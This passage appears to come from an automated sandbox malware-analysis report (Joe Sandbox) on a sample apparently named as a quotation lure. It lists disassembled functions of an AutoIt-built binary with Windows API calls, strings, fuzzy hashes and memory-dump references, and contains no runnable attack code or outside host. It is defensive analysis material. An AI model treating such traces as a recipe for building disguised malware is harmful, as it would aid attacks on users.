                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00E89AD2
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00E89B8B
                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00E89BA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: 0
                                                                      • API String ID: 2326795674-4108050209
                                                                      • Opcode ID: ad681cdd8b27389019ff1590df87c84161c816dc4819ba4116fc7ca2b78b5e16
                                                                      • Instruction ID: d8d6c7d0602621ebcb51b831b186c3393f4349a2e3811f108f325be006a45262
                                                                      • Opcode Fuzzy Hash: ad681cdd8b27389019ff1590df87c84161c816dc4819ba4116fc7ca2b78b5e16
                                                                      • Instruction Fuzzy Hash: 7502DF31604201AFD729EF25C948BBABBE4FF49308F08552DF59DB62A2D735D844CB51
                                                                      Function 00E8A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 00E8A903
                                                                      • SetTextColor.GDI32(?,?), ref: 00E8A907
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E8A91D
                                                                      • GetSysColor.USER32(0000000F), ref: 00E8A928
                                                                      • CreateSolidBrush.GDI32(?), ref: 00E8A92D
                                                                      • GetSysColor.USER32(00000011), ref: 00E8A945
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8A953
                                                                      • SelectObject.GDI32(?,00000000), ref: 00E8A964
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00E8A96D
                                                                      • SelectObject.GDI32(?,?), ref: 00E8A97A
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A999
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8A9B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E8A9C5
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8A9ED
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E8AA14
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00E8AA32
                                                                      • DrawFocusRect.USER32(?,?), ref: 00E8AA3D
                                                                      • GetSysColor.USER32(00000011), ref: 00E8AA4B
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00E8AA53
                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E8AA67
                                                                      • SelectObject.GDI32(?,00E8A5FA), ref: 00E8AA7E
                                                                      • DeleteObject.GDI32(?), ref: 00E8AA89
                                                                      • SelectObject.GDI32(?,?), ref: 00E8AA8F
                                                                      • DeleteObject.GDI32(?), ref: 00E8AA94
                                                                      • SetTextColor.GDI32(?,?), ref: 00E8AA9A
                                                                      • SetBkColor.GDI32(?,?), ref: 00E8AAA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: c57e7f661817a579ad6aeeb4984f16f57f70bca9e96ce1fff05a25e0713c3bcf
                                                                      • Instruction ID: d6f2ca5108f53feb72e7cbdbbf08b989495f61aebca0a7e9695673dc29086d42
                                                                      • Opcode Fuzzy Hash: c57e7f661817a579ad6aeeb4984f16f57f70bca9e96ce1fff05a25e0713c3bcf
                                                                      • Instruction Fuzzy Hash: F0515E71901208EFDF109FA5DC48EAE7B79EB48320F154226F919BB2A1D7719944DB90
                                                                      Function 00E889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E88AC1
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E88AD2
                                                                      • CharNextW.USER32(0000014E), ref: 00E88B01
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E88B42
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E88B58
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E88B69
                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E88B86
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00E88BD8
                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E88BEE
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E88C1F
                                                                      • _memset.LIBCMT ref: 00E88C44
                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E88C8D
                                                                      • _memset.LIBCMT ref: 00E88CEC
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E88D16
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E88D6E
                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00E88E1B
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E88E3D
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E88E87
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E88EB4
                                                                      • DrawMenuBar.USER32(?), ref: 00E88EC3
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00E88EEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                      • String ID: 0
                                                                      • API String ID: 1073566785-4108050209
                                                                      • Opcode ID: 5f339585261bcb1c760cf3b5e4b476df3485564018236b727eb520c7d7fca76f
                                                                      • Instruction ID: 72b5cac506194946f5df79809882a16f26187f60a82d2c1196c366abfdd6d82b
                                                                      • Opcode Fuzzy Hash: 5f339585261bcb1c760cf3b5e4b476df3485564018236b727eb520c7d7fca76f
                                                                      • Instruction Fuzzy Hash: 1DE1AF75900218AFDB20AF61CD84EEE7BB9EF04714F50919AFE1DBA190DB709984DF60
                                                                      Function 00E8488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00E849CA
                                                                      • GetDesktopWindow.USER32 ref: 00E849DF
                                                                      • GetWindowRect.USER32(00000000), ref: 00E849E6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E84A48
                                                                      • DestroyWindow.USER32(?), ref: 00E84A74
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E84A9D
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E84ABB
                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E84AE1
                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00E84AF6
                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E84B09
                                                                      • IsWindowVisible.USER32(?), ref: 00E84B29
                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E84B44
                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E84B58
                                                                      • GetWindowRect.USER32(?,?), ref: 00E84B70
                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00E84B96
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00E84BB0
                                                                      • CopyRect.USER32(?,?), ref: 00E84BC7
                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00E84C32
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: ($0$tooltips_class32
                                                                      • API String ID: 698492251-4156429822
                                                                      • Opcode ID: fba16eae812ce2cc4cbbdc7b3c9155c4c459470d3507680dcd74f392ec244e35
                                                                      • Instruction ID: 7247bae26da6d1f600ff94e3b3499b11d8b9b2a44e318f436a8588dd23f87482
                                                                      • Opcode Fuzzy Hash: fba16eae812ce2cc4cbbdc7b3c9155c4c459470d3507680dcd74f392ec244e35
                                                                      • Instruction Fuzzy Hash: D9B17BB1604341AFDB04EF65C844B6ABBE4FF84314F009A1CF59DAB2A2D771E845CB95
                                                                      Function 00E6449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E644AC
                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E644D2
                                                                      • _wcscpy.LIBCMT ref: 00E64500
                                                                      • _wcscmp.LIBCMT ref: 00E6450B
                                                                      • _wcscat.LIBCMT ref: 00E64521
                                                                      • _wcsstr.LIBCMT ref: 00E6452C
                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E64548
                                                                      • _wcscat.LIBCMT ref: 00E64591
                                                                      • _wcscat.LIBCMT ref: 00E64598
                                                                      • _wcsncpy.LIBCMT ref: 00E645C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 699586101-1459072770
                                                                      • Opcode ID: f192bb51209212a7413b2355ac955c95d6e5df525c1498e139f2b936fb7dede4
                                                                      • Instruction ID: 3f3d85afe2672007a87b7c63c533ac0712aa2523b21ba456f6e2eb8cac35adc9
                                                                      • Opcode Fuzzy Hash: f192bb51209212a7413b2355ac955c95d6e5df525c1498e139f2b936fb7dede4
                                                                      • Instruction Fuzzy Hash: AA41E4719403147BDB14BA74EC43EFF77ECDF41750F00206AFA09B61C2EA359A0196A6
                                                                      Function 00E027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E028BC
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00E028C4
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E028EF
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00E028F7
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00E0291C
                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E02939
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E02949
                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E0297C
                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E02990
                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00E029AE
                                                                      • GetStockObject.GDI32(00000011), ref: 00E029CA
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E029D5
                                                                        • Part of subcall function 00E02344: GetCursorPos.USER32(?), ref: 00E02357
                                                                        • Part of subcall function 00E02344: ScreenToClient.USER32(00EC57B0,?), ref: 00E02374
                                                                        • Part of subcall function 00E02344: GetAsyncKeyState.USER32(00000001), ref: 00E02399
                                                                        • Part of subcall function 00E02344: GetAsyncKeyState.USER32(00000002), ref: 00E023A7
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00E01256), ref: 00E029FC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: 21b52871bc56f6e6dd7b93bbf4316b4647b7cc0435898ae9c1b7627849010c8c
                                                                      • Instruction ID: 89ed838d1fd8f78d8290c89260d0bc1466d724b705e2fa5d4aa4a039c0c3254f
                                                                      • Opcode Fuzzy Hash: 21b52871bc56f6e6dd7b93bbf4316b4647b7cc0435898ae9c1b7627849010c8c
                                                                      • Instruction Fuzzy Hash: 41B16C71A0020AEFDB14DFA9DC49BAE7BB4FB48314F105129FA15B62E0DB74E895CB50
                                                                      Function 00E5A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E5A47A
                                                                      • __swprintf.LIBCMT ref: 00E5A51B
                                                                      • _wcscmp.LIBCMT ref: 00E5A52E
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E5A583
                                                                      • _wcscmp.LIBCMT ref: 00E5A5BF
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E5A5F6
                                                                      • GetDlgCtrlID.USER32(?), ref: 00E5A648
                                                                      • GetWindowRect.USER32(?,?), ref: 00E5A67E
                                                                      • GetParent.USER32(?), ref: 00E5A69C
                                                                      • ScreenToClient.USER32(00000000), ref: 00E5A6A3
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E5A71D
                                                                      • _wcscmp.LIBCMT ref: 00E5A731
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E5A757
                                                                      • _wcscmp.LIBCMT ref: 00E5A76B
                                                                        • Part of subcall function 00E2362C: _iswctype.LIBCMT ref: 00E23634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                      • String ID: %s%u
                                                                      • API String ID: 3744389584-679674701
                                                                      • Opcode ID: 897c0167f8256af14baf29d9e0c6bbee88571c5e94f208b637c3b90a3090a8c7
                                                                      • Instruction ID: e34047eb30d87368814e15adbfb3c1f2a0c414c5b5720e4997ade4d2c8f00faf
                                                                      • Opcode Fuzzy Hash: 897c0167f8256af14baf29d9e0c6bbee88571c5e94f208b637c3b90a3090a8c7
                                                                      • Instruction Fuzzy Hash: 25A1B571204206AFD715DF60C884FAAB7E8FF44355F085A3AFD99E2150DB30E959CB92
                                                                      Function 00E5AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00E5AF18
                                                                      • _wcscmp.LIBCMT ref: 00E5AF29
                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E5AF51
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00E5AF6E
                                                                      • _wcscmp.LIBCMT ref: 00E5AF8C
                                                                      • _wcsstr.LIBCMT ref: 00E5AF9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E5AFD5
                                                                      • _wcscmp.LIBCMT ref: 00E5AFE5
                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E5B00C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E5B055
                                                                      • _wcscmp.LIBCMT ref: 00E5B065
                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00E5B08D
                                                                      • GetWindowRect.USER32(00000004,?), ref: 00E5B0F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                      • String ID: @$ThumbnailClass
                                                                      • API String ID: 1788623398-1539354611
                                                                      • Opcode ID: 1a763cf309c917c05ffbded5a52ab9e721191981f9e1568eaafc206e595263aa
                                                                      • Instruction ID: 39292d5d59e0c7a423fbbb5705f7107e5de4689d5a312da827dee2ab516fa679
                                                                      • Opcode Fuzzy Hash: 1a763cf309c917c05ffbded5a52ab9e721191981f9e1568eaafc206e595263aa
                                                                      • Instruction Fuzzy Hash: BC81C2711083059FDB04DF10C981FAA77D8EF84319F18A96AFD89AA091DB34DD8DCBA1
                                                                      Function 00E8C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00E8C627
                                                                        • Part of subcall function 00E8AB37: ClientToScreen.USER32(?,?), ref: 00E8AB60
                                                                        • Part of subcall function 00E8AB37: GetWindowRect.USER32(?,?), ref: 00E8ABD6
                                                                        • Part of subcall function 00E8AB37: PtInRect.USER32(?,?,00E8C014), ref: 00E8ABE6
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C690
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E8C69B
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E8C6BE
                                                                      • _wcscat.LIBCMT ref: 00E8C6EE
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E8C705
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C71E
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00E8C735
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00E8C757
                                                                      • DragFinish.SHELL32(?), ref: 00E8C75E
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E8C851
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
                                                                      • API String ID: 169749273-730855631
                                                                      • Opcode ID: 76fee54790c7af3b6ec76445b3317471bb9d0a217e5a33bc6a5f90cef8a1f2e4
                                                                      • Instruction ID: eb1086b51f16f652f9881be8af5e38f7aaf4bd145b9a7f8a6750b86cfb09d1b9
                                                                      • Opcode Fuzzy Hash: 76fee54790c7af3b6ec76445b3317471bb9d0a217e5a33bc6a5f90cef8a1f2e4
                                                                      • Instruction Fuzzy Hash: 32618071108300AFC705EF64CC85D9FBBE8EFC9710F50192EF599A21A1DB31A949CB62
                                                                      Function 00E5ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                      • API String ID: 1038674560-1810252412
                                                                      • Opcode ID: 9586849ab91b114d892af000cc794a1e95abf306fbc3e410f01574f54d6ec5a8
                                                                      • Instruction ID: 7366a5ba8a6c4ceacab5cd73ea07a400ed03758c53f684f4fc36823a99e74595
                                                                      • Opcode Fuzzy Hash: 9586849ab91b114d892af000cc794a1e95abf306fbc3e410f01574f54d6ec5a8
                                                                      • Instruction Fuzzy Hash: 2631A471A48309ABDB10FA60DE03EEFB7E4AF10715F643929F881714D1EF616F488A52
                                                                      Function 00E74FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00E75013
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E7501E
                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00E75029
                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00E75034
                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00E7503F
                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00E7504A
                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00E75055
                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00E75060
                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00E7506B
                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00E75076
                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00E75081
                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00E7508C
                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00E75097
                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00E750A2
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00E750AD
                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00E750B8
                                                                      • GetCursorInfo.USER32(?), ref: 00E750C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
